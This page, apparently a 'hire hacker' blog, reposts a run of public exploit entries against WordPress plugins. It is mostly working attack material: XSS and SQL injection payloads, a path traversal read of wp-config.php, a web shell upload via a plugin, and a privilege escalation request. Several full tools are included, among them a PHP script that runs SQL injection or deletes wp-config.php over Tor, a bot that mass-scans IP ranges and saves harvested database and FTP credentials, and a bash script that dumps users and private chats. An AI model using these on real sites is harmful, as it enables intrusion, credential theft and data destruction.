Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130509

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)
# Date: 07/09/2021
# Exploit Author: Nikhil Kapoor
# Software Link: https://wordpress.org/plugins/wp-sitemap-page/
# Version: 1.6.4
# Category: Web Application
# Tested on Windows

How to Reproduce this Vulnerability:

1. Install WordPress 5.8.0
2. Install and activate WP Sitemap Page
3. Navigate to Settings >> WP Sitemap Page >> Settings and enter the XSS payload into the "How to display the posts" Input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: </textarea><svg/onload=confirm('XSS')>
HireHackking 
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Dork:N/A
# Date: 2020-02-17
# Exploit Author: UltraSecurityTeam
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: UltraSec.Org
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
# Tested on: Windows/Linux
# Version: 1.6.2



.:: Plugin Description ::.
An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts


.:: Proof Of Concept (PoC) ::.

Step 1 - Open WordPress Setting 
Step 2 - Open Wp Sitemap Page
Step 3 - Inject Your Java Script Codes to  Exclude pages 
Step 4 - Click Button Save Changes
Step 5 - Run Your Payload


.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>


.:: Post Request ::.
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes
HireHackking 
# Exploit Title: WP Security Audit Log Plugin, Sensitive Information Disclosure <= 3.1.1 
# Google Dork: inurl:/wp-content/uploads/wp-security-audit-log/
# Date: 3/13/2018
# Exploit Author: Colette Chamberland, Defiant, Inc.
# Vendor Homepage: http://wpwhitesecurity.com
# Software Link: https://wordpress.org/plugins/wp-security-audit-log/
# Version: <=3.1.1
# Tested on: Wordpress 4.9.x
# CVE : CVE-2018-8719

Description:
No protection on the wp-content/uploads/wp-security-audit-log/*
which is indexed by google and allows for attackers to possibly find user information (bad login attempts)

/wp-security-audit-log/classes/Sensors/System.php':
$upload_dir = wp_upload_dir();
$uploads_dir_path = trailingslashit( $upload_dir['basedir'] ) . 'wp-security-audit-log/404s/users/';
$uploads_url = trailingslashit( $upload_dir['baseurl'] ) . 'wp-security-audit-log/404s/users/';

/wp-security-audit-log/classes/Sensors/LogInOut.php':
// Directory for logged in users log files.
		$user_upload_dir    = wp_upload_dir();
		$user_upload_path   = trailingslashit( $user_upload_dir['basedir'] . '/wp-security-audit-log/failed-logins/' );
		if ( ! $this->CheckDirectory( $user_upload_path ) ) {
			wp_mkdir_p( $user_upload_path );
		}
HireHackking 
source: https://www.securityfocus.com/bid/68557/info

WP Rss Poster plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WP Rss Poster 1.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18
HireHackking 
<?php
/**
 * Exploit Titie: WP PRO Advertising System - All In One Ad Manager  Exploit
 * Google Dork:
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://wordpress-advertising.com/
 * Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
 * Version: 4.6.18
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: SQLi, Unserialize, File Delete.
 * Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
 */


require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();


$options = getopt("t:m:f:c:u:p:s:",array('tor:'));
print_r($options);
$options = validateInput($options);

if (!$options){
    showHelp();
}

if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}

class CPDF_Adapter{


    private  $_image_cache;
    public function set_file($file){
        $this->_image_cache = array($file);
    }
}



function logIn(){
    global $curl, $options;
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    $curl->get($options['t']);
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
        die();
    }
    file_put_contents('login.html',$curl->getResponse());


}



function exploit(){
    global $curl, $options;

    if ($options['m'] == 'd'){
        echo "Delete mode\n";
        $pay_load_obj = new CPDF_Adapter();
        $pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
        $pay_load = base64_encode(serialize(array($pay_load_obj)));
        $data = array('stats_pdf'=>'1', 'data'=>$pay_load);
        $curl->post($options['t'].'?'.http_build_query($data));
        $resp = $curl->getResponse();
        echo $resp;
    } else {
        echo "SQLi mode \n";
        echo "Trying a longin...\n";
        logIn();
        echo "Running SQL in Inject mode: ".$options['s']."\n";
        $pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
        $resp = $curl->getResponse();
        //Grab the output
        if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
           if (isset($mat[1])){
               echo "Response:\n".$mat[1]."\n";
               die("Done\n");
           }
        }
        echo "Failed getting SQLi response, response saved to resp.html\n";
        file_put_contents('resp.html', $resp);

    }




}



exploit();



function validateInput($options){

    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }

    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    }
    if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
        return false;
    }
    if ($options['m'] == 's' && (!isset($options['u'])  || !isset($options['p']) || !isset($options['s'])) ){
        return false;
    }
    $options['tor'] = isset($options['tor']);

    return $options;
}


function showHelp(){
    global $argv;
    $help = <<<EOD

    WP PRO Advertising System - All In One Ad Manager Expoit Pack

Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE]  -s [SQL]

       *** In order to use the SQLi part you need an advertiser login **

       [TARGET_URL] http://localhost/wordpress/
       [MODE] d - Delete wp-config.php
              s - SQL Injection
       [TOR] Use tor network? (Connects to 127.0.0.1:9150)

       Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
       To get all users and passwords you would do :
       SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)  FROM wp_users LIMIT 1
       SELECT concat(user_login,0x3a,user_pass)  FROM wp_users LIMIT 1,1
       SELECT concat(user_login,0x3a,user_pass)  FROM wp_users LIMIT 2,1


Examples:
       php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
       php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)  FROM wp_users LIMIT 1'

    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}
HireHackking 
# Exploit Title:  WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
# Software Link: https://wordpress.org/plugins/wp-email-users/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3.1
# Tested on: Ubuntu 14.04

1 - Description:

Type user access:  is accessible for any registered user

$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection

http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/

2 - Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 – Using:

<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
    <input type="text" name="action" value="weu_my_action">
    <input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE  term_id=1">
    <input type="text" name="temp_sel_key" value="select_temp">
    <input type="submit" name="">
</form>


3 - Timeline:

    12/01/2016 – Discovered
    13/12/2016 – Vendor not finded
HireHackking 
# Exploit Title:  WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/
 
# Software Link: https://wordpress.org/plugins/wp-private-messages/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.1
# Tested on: Ubuntu 14.04

1 - Description:

Type user access: registered user.  
$_GET[‘id’] is not escaped. Url is accessible for every registered user.

http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/

2 - Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 -Using :

http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved

Obs: Use id number of your user in third column after word select. For example:

…UNION+SELECT+1,2,1,name,slug…

…UNION+SELECT+1,2,2,name,slug…

…UNION+SELECT+1,2,3,name,slug…

…UNION+SELECT+1,2,4,name,slug…

…UNION+SELECT+1,2,5,name,slug…

3 - Timeline:

    12/12/2016 – Discovered
    13/12/2016 – Vendor not finded
HireHackking 
source: https://www.securityfocus.com/bid/60854/info

WP Private Messages plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
HireHackking 
# Exploit Title: WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2021-05-31
# Exploit Author: Bastijn Ouwendijk
# Vendor Homepage: http://goprayer.com/
# Software Link: https://wordpress.org/plugins/wp-prayer/
# Version: 1.6.1 and earlier
# Tested on: Windows 10
# Proof: https://bastijnouwendijk.com/cve-2021-24313/

Steps to exploit this vulnerability:

1. Log into the WordPress website with a user account, can be a user with any role
2. Go to the page where prayer or praise request can be made and fill in the requested information
3. In the 'prayer_messages' field of the prayer request form put the payload: <script>alert("XSS")</script>
4. Submit the form
5. Go to the page where the prayer requests are listed
6. The prayer requests are loaded and an alert is shown with text 'XSS' in the browser
HireHackking 
source: https://www.securityfocus.com/bid/47622/info

The WP Photo Album plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

WP Photo Album 1.5.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=wp-photo-album/wppa.php&tab=del&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
HireHackking 
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
# Date: April 11, 2015
# Exploit Author: @LookHin (Khwanchai Kaewyos)
# Google Dork: inurl:?fdx_switcher=mobile
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
# Version:  WP Mobile Edition Version 2.2.7

- Overview:
Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'

- Search on Google
inurl:?fdx_switcher=mobile

- POC
Exploit view source code wp-config.php
http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
HireHackking 
######################################################################################
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability              #
# Date: june 6, 2015                                                                 #
# Exploit Author: ViRuS OS                                                           #
# Google Dork: inurl:?fdx_switcher=mobile                                            #
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/                  #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip  #
# Version:  WP Mobile Edition Version 2.2.7                                          #
# Tested on : windows                                                                #           
###################################################################################### 
Description :
Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path 
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>

# Exploite Code :
<?php 
//ViRuS OS
set_time_limit(0);
error_reporting(0);
echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n";
print " Coded By        _                            
          __   _(_)_ __ _   _ ___    ___  ___ 
          \ \ / / | '__| | | / __|  / _ \/ __|
           \ V /| | |  | |_| \__ \ | (_) \__ \
            \_/ |_|_|   \__,_|___/  \___/|___/                                    
Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH 
";
echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Welcome Master ViRuS OS ################\n\n";
echo "Server Target IP : ";
$ip=trim(fgets(STDIN,1024));
$ip = explode('.',$ip);
$ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
for($i=0;$i <= 255;$i++)
{
$sites = array_map("site", bing("ip:$ip.$i wordpress"));
$un=array_unique($sites);
echo "[+] Scanning -> ", $ip.$i, ""."\n";
echo "Found : ".count($sites)." sites\n\n";
foreach($un as $pok){
$host=findit($file,"DB_HOST', '","');");
$db=findit($file,"DB_NAME', '","');");
$us=findit($file,"DB_USER', '","');");
$pw=findit($file,"DB_PASSWORD', '","');");
$bda="http://$pok";
	$linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';
	$dn=($bda).($linkof);
	$file=@file_get_contents($dn);
	if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
	echo "[+] Scanning => ".$bda."\n\n";
	echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
	echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
	echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
	echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
	$db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
	$user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
	$pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
	$host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
	$ux = "".$bda."\r\n";
	$ux1 = "".$db."\r\n";
	$ux2 = "".$user."\r\n";
	$ux3 = "".$pass."\r\n";
	$ux4 = "".$host."\r\n";
	$save=fopen('exploited.txt','ab');
	fwrite($save,"$ux");
	fwrite($save,"$ux1");
	fwrite($save,"$ux2");
	fwrite($save,"$ux3");
	fwrite($save,"$ux4");
	}
	elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
	echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
	echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
	echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
	}
	else{echo $bda." : Exploit failed \n\n";}
}
}
function findit($mytext,$starttag,$endtag) {
 $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
 $posRight = stripos($mytext,$endtag,$posLeft+1);
 return  substr($mytext,$posLeft,$posRight-$posLeft);
}
function site($link){
return str_replace("","",parse_url($link, PHP_URL_HOST));
}
function bing($what){
for($i = 1; $i <= 2000; $i += 10){
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
preg_match_all('#;a=(.*?)" h="#',$data, $links);
foreach($links[1] as $link){
$allLinks[] = $link;
}
if(!preg_match('#"sw_next"#',$data)) break;
}

if(!empty($allLinks) && is_array($allLinks)){
return array_unique(array_map("urldecode", $allLinks));
}
}
?>
HireHackking 
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10


This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .

I have wrote a Complete POC post:

https://aadityapurani.com/2016/06/03/mobile-detector-poc/

I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU

Simple POC:

Go to: 

[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

and it will get saved in directory:

/wp-content/plugins/wp-mobile-detector/cache/shell.php
HireHackking 
# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities]
# Date: 2015/05/19
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# Category: webapps

========================================
* 1. Privilege escalation
  ========================================

1.1 Description

Any registered user can perform a privilege escalation through 
`iv_membership_update_user_settings` AJAX action.
Although this exploit can be used to modify other plugin related data 
(eg payment status and expiry date), privilege escalation can lead to a 
serious incident because the malicious user can take administrative role 
to the infected website.

1.2 Proof of Concept

* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` 
with data: 
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 


1.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

1.4 Solution

No official solution yet exists.

========================================
* 2. Stored XSS
========================================

2.1 Description

All input fields from registered users aren't properly escaped. This 
could lead to an XSS attack that could possibly affect all visitors of 
the website, including administators.

2.2 Proof of Concept

* Login as regular user
* Update any field of your profile appending at the end
     `<script>alert('XSS');</script>`
     or
     `<script src=”http://malicious .server/my_malicious_script.js”/>`

2.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

2.4 Solution

No official solution yet exists.

========================================
* 3. Unauthorized post publish and stored XSS
  ========================================

3.1 Description

Registered users can publish a post without administrator confirmation. 
Normally all posts submitted  by users registered with WP Membership 
plugin are stored with the status `pending`. A malicious user though can 
publish his post by crafting the form is used for submission.

3.2 Proof of Concept

* Login as regular user
  whom belongs to a group that can submit new posts
* Visit the `New Post` section at your profile
* Change field `post_status`:
     <select id="post_status" class="form-control" name="post_status">
         <option value="publish" selected=”selected”>Pending 
Review</option>
         <option value="draft">Draft</option>
     </select>

The post gets immediately published after you submit the form and is 
visible to all visitors of the website.

In addition a stored XSS attack can be performed due to insufficient 
escaping of the post content input.

3.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

3.4 Solution

No official solution yet exists.

3.5 Workaround

Prevent users from submitting new posts through the relative option in 
plugin's settings
HireHackking 
source: https://www.securityfocus.com/bid/51220/info

WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss]
HireHackking 
Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin

Abstract

A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160724-0010

Tested versions

This issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03.

Fix

This issue is resolved in WP Live Chat Support version 6.2.04.

Introduction

WP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.

Details

The vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602):

wp-live-chat-support/wp-live-chat-support.php:

600 if ($_POST['action'] == "wplc_user_send_offline_message") {
601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }
602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }
603 do_action("wplc_hook_offline_message",array(
604 "cid"=>$_POST['cid'],
605 "name"=>$_POST['name'],
606 "email"=>$_POST['email'],
607 "url"=>get_site_url(),
608 "msg"=>$_POST['msg']
609 )
610 );
611 }

wp-live-chat-support/functions.php:

1206 function wplc_store_offline_message($name, $email, $message){
1207 global $wpdb;
1208 global $wplc_tblname_offline_msgs;
1209 
1210 $wplc_settings = get_option('WPLC_SETTINGS');
1211 
1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){
1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {
1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];
1215 } else {
1216 $ip_address = $_SERVER['REMOTE_ADDR'];
1217 }
1218 $offline_ip_address = $ip_address;
1219 } else {
1220 $offline_ip_address = "";
1221 }
1222 
1223 
1224 $ins_array = array(
1225 'timestamp' => current_time('mysql'),
1226 'name' => $name,
1227 'email' => $email,
1228 'message' => $message,
1229 'ip' => $offline_ip_address,
1230 'user_agent' => $_SERVER['HTTP_USER_AGENT']
1231 );
1232 
1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );
1234 return;
1235 }

The vulnerability can be exploited using a specially crafted POST request. The victim needs view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted taht the offline message functionality is available even if there is a logged on chat user present.

Proof of concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 361
Connection: close
   
action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>
HireHackking 
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)
# Date: July 2, 2021
# Exploit Author: Mohammed Adam 
# Vendor Homepage: https://wplearnmanager.com/
# Software Link: https://wordpress.org/plugins/learn-manager/
# Version: 1.1.2
# References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1

*Description:*

The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated)

*Proof of Concept:*

POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Connection: close
Upgrade-Insecure-Requests: 1

fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save

Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere
HireHackking 
# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
# Date: 11-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu 
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
# Vendor Homepage: http://www.intensewp.com/
# Version: 1.4
# CVE : CVE-2017-9603
# Category: webapps

 

1. Description:

   

SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
allows authenticated users to execute arbitrary SQL commands via the jobid
parameter to wp-admin/edit.php. 

 

2. Proof of Concept:

 

http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment

 

3. Solution:

   

A new version of WP Jobs is available. Update the WordPress WP Jobs to the
latest version.

 

4. Reference:

 

http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
HireHackking 
# Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure
# Exploit Author: Keyvan Hardani
# Date: 22/11/2021
# Vendor Homepage: https://wp-guppy.com/
# Version: up to 1.1
# Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
# Usage ./exploit.sh -h

#!/bin/bash

Help()
{
# Display Help
echo "Usage"
echo
echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
echo
echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"
echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"
echo "-h Print this Help."
echo
}

while getopts ":h" option; do
case $option in
h) # display Help
Help
exit;;
esac
done

if [ $1 == 1 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi

if [ $1 == 2 ]
then
curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
fi
if [ $1 == 3 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi
HireHackking 
# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)
